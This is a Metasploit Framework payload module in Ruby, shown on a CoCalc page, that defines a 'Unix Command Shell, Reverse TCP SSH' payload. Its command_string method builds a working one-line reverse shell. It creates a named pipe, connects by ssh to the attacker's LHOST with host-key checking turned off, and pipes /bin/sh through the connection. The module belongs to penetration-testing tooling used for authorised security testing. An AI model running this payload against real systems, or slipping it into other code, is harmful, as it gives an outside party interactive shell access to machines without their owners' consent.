CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/cmd/unix/reverse_ssh.rb
Views: 11779
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'msf/core/handler/reverse_ssh'

7


8
module MetasploitModule

9


10
  CachedSize = :dynamic

11


12
  include Msf::Payload::Single

13
  include Msf::Sessions::CommandShellOptions

14


15
  def initialize(info = {})

16
    super(merge_info(info,

17
     'Name'        => 'Unix Command Shell, Reverse TCP SSH',

18
     'Description' => 'Connect back and create a command shell via SSH',

19
     'Author'      => [

20
       'RageLtMan <rageltman[at]sempervictus>', # Rex/Metasploit

21
       'hirura' # HrrRbSsh

22
     ],

23
     'License'     => MSF_LICENSE,

24
     'Platform'    => 'unix',

25
     'Arch'        => ARCH_CMD,

26
     'Handler'     => Msf::Handler::ReverseSsh,

27
     'Session'     => Msf::Sessions::SshCommandShellReverse,

28
     'PayloadType' => 'cmd',

29
     'RequiredCmd' => 'ssh',

30
     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }

31
    ))

32
    register_advanced_options(

33
      [

34
        Msf::OptString.new('SshClientOptions', [

35
          false,

36
          "Space separated options for the ssh client",

37
          'UserKnownHostsFile=/dev/null StrictHostKeyChecking=no'

38
        ]),

39
        OptString.new('SSHPath', [true, 'The path to the SSH executable', 'ssh']),

40
        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])

41
      ]

42
    )

43
  end

44


45
  #

46
  # Constructs the payload

47
  #

48
  def generate(_opts = {})

49
    return super + command_string

50
  end

51


52
  #

53
  # Returns the command string to use for execution

54
  #

55
  def command_string

56
    backpipe = Rex::Text.rand_text_alpha_lower(4..8)

57
    lport = datastore['LPORT'] == 22 ? '' : "-p #{datastore['LPORT']} "

58
    opts =  datastore['SshClientOptions'].blank? ? '' : datastore['SshClientOptions'].split(' ').compact.map {|e| e = "-o #{e} " }.join

59
    "mkfifo /tmp/#{backpipe};#{datastore['SSHPath']} -qq #{opts}#{datastore['LHOST']} #{lport}0</tmp/#{backpipe}|#{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1;rm /tmp/#{backpipe}"

60
  end

61
end

62


63